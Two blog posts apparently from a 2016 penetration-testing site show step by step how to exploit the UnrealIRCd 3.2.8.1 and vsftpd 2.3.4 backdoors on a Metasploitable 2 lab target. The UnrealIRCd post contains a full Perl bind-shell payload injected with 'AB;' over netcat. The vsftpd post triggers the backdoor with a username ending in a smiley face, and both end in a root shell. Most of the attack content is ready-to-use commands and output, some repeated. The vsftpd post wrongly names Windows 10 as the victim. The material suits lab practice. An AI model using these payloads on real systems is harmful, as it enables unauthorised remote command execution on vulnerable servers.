UnrealIRCD 3.2.8.1 Backdoor Command Execution
July 02, 2016 —
metalkey
Attacker: Kali LinuxVictim: Metasploitable 2
Unreal IRCD 3.2.8.1 contains a backdoor that is triggered by entering AB; upon connecting. The backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
The following example demonstrates it’s use on Metasploitable 2 (192.168.1.142).
Generating the Payload
We’re going to generate a unix bind shell with msfvenom (port 4444) and connect to this with Netcat.
root@kali:~$ msfvenom -p cmd/unix/bind_perl --payload-options
root@kali:~$msfvenom -p cmd/unix/bind_perl LHOST=192.168.1.142
No platform was selected, choosing Msf::Module::Platform::Unix from the payload
No Arch selected, selecting Arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 240 bytes
perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(){if($_=~ /(.*)/){system $1;}};'
root@kali:~$
No platform was selected, choosing Msf::Module::Platform::Unix from the payload
No Arch selected, selecting Arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 240 bytes
perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(){if($_=~ /(.*)/){system $1;}};'
Triggering the Exploit
root@kali:~$ nc -vn 192.168.1.142 6667
(UNKNOWN) [192.168.1.142] 6667 (ircd) open
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
AB;perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(){if($_=~ /(.*)/){system $1;}};'
:irc.Metasploitable.LAN 451 AB;perl :You have not registered
(UNKNOWN) [192.168.1.142] 6667 (ircd) open
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:irc.Metasploitable.LAN 451 AB;perl :You have not registered
Connecting to the Netcat Bind Shell
root@kali:~$ nc -vn 192.168.1.142 4444
(UNKNOWN) [192.168.1.142] 4444 (?) open
python -c "import pty;pty.spawn('/bin/bash')"
root@metasploitable:/etc/unreal#
(UNKNOWN) [192.168.1.142] 4444 (?) open
root@metasploitable:/etc/unreal#
Tags: backdoors
VSFTPD v2.3.4 Backdoor Command Execution
July 02, 2016 —
metalkey
Attacker: Kali LinuxVictim: Windows 10
VSFTPD v2.3.4 contains a backdoor that is triggered by entering anystring:) as the username (no password required). After the backdoor is triggered, the target machine opens a shell on port 6200.
This example demonstrates it’s use on Metasploitable 2 (192.168.1.142).
Triggering the Backdoor
root@kali:~$ ftp 192.168.1.142
Connected to 192.168.1.142.
220 (vsFTPd 2.3.4)
Name (192.168.1.142:root):123456:)
331 Please specify the password.
Password: [Enter]
[CTRL+C]
421 Service not available, remote server has closed connection
Connected to 192.168.1.142.
220 (vsFTPd 2.3.4)
Name (192.168.1.142:root):
331 Please specify the password.
Password: [Enter]
[CTRL+C]
421 Service not available, remote server has closed connection
Connecting to the Shell
root@kali:~$ nc -vn 192.168.1.142 6200
(UNKNOWN) [192.168.1.142] 6200 (?) open
python -c "import pty;pty.spawn('/bin/bash')"
root@metasploitable:/#
(UNKNOWN) [192.168.1.142] 6200 (?) open
root@metasploitable:/#
Tags: backdoors